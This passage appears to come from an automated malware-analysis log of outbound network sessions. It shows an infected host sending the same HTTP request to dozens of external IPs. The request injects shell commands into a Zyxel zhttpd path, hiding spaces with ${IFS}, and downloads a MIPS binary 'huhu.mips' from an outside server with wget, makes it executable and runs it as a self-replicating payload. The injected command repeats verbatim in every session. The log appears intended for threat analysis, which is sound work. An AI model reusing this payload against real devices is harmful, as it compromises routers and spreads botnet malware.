                                                        Feb 2, 2024 06:21:16.039896965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5834192.168.2.1435052205.127.170.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039941072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5835192.168.2.1444348103.27.113.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.039968967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5836192.168.2.1454628164.247.223.18443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040008068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5837192.168.2.1445746189.67.7.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040045977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5838192.168.2.145055285.39.27.41443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040081024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5839192.168.2.1436332195.161.69.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040123940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5840192.168.2.1443348102.228.187.231443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040169001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5841192.168.2.145698667.60.172.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040200949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5842192.168.2.1435490131.116.140.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040225983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5843192.168.2.144417238.63.182.115443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040285110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5844192.168.2.1457964210.9.243.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040319920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5845192.168.2.1458646149.230.85.135443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040350914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5846192.168.2.1459368180.93.116.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040400982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5847192.168.2.1443664165.121.62.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040446997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5848192.168.2.1451286198.142.240.160443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040488958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5849192.168.2.143940093.29.95.122443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040544987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5850192.168.2.1454854160.11.8.95443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040579081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5851192.168.2.1436744181.186.76.193443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040625095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5852192.168.2.1448716205.252.85.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040664911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5853192.168.2.1439322119.183.166.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040712118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5854192.168.2.144590677.39.12.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040760994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5855192.168.2.1436536196.116.104.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040797949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5856192.168.2.1455052183.214.50.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040851116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5857192.168.2.1436144134.251.193.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040889978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5858192.168.2.145112096.199.129.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040944099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5859192.168.2.1444072184.152.54.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.040975094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5860192.168.2.143897690.6.124.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041032076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5861192.168.2.143289895.244.171.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041081905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5862192.168.2.1444438120.72.2.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041111946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5863192.168.2.1440014159.26.42.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041162014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5864192.168.2.1444800149.240.245.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041193962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5865192.168.2.1432918121.62.134.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041233063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5866192.168.2.143395083.20.96.67443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041281939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5867192.168.2.1445040126.150.150.16443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041322947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5868192.168.2.1455386101.124.216.158443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041380882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5869192.168.2.144324273.202.86.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041419029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5870192.168.2.1449180111.190.103.139443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041471004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5871192.168.2.1447096191.32.242.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041522980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5872192.168.2.1441580100.249.168.248443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041557074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5873192.168.2.1452940181.131.10.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041603088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5874192.168.2.1451934132.253.230.213443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041651011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5875192.168.2.144641067.251.248.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041677952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5876192.168.2.1442856131.2.99.142443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041721106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5877192.168.2.144259088.16.152.199443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041745901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5878192.168.2.1455238163.73.113.181443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041781902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5879192.168.2.1451632172.100.208.154443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041825056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5880192.168.2.1443756210.249.158.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041876078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5881192.168.2.1458874106.17.213.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041918039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5882192.168.2.1457454189.183.56.15443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041956902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5883192.168.2.145984431.12.13.113443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.041980028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5884192.168.2.1442854181.241.241.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042035103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5885192.168.2.1439458181.198.26.225443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042062998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5886192.168.2.144883270.212.83.170443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042120934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5887192.168.2.1445644193.250.249.137443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042165995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5888192.168.2.144702258.45.1.7443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042196035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5889192.168.2.1434220194.159.30.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042223930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5890192.168.2.146023247.146.97.39443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042289019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5891192.168.2.1438622174.47.177.185443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042354107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5892192.168.2.145988863.34.66.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042380095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5893192.168.2.145262864.207.164.71443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042423010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5894192.168.2.145343899.68.204.69443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042457104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5895192.168.2.143700612.164.149.196443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:16.042500973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        5896192.168.2.1460058137.108.106.54443
                                                        TimestampBytes transferredDirectionData
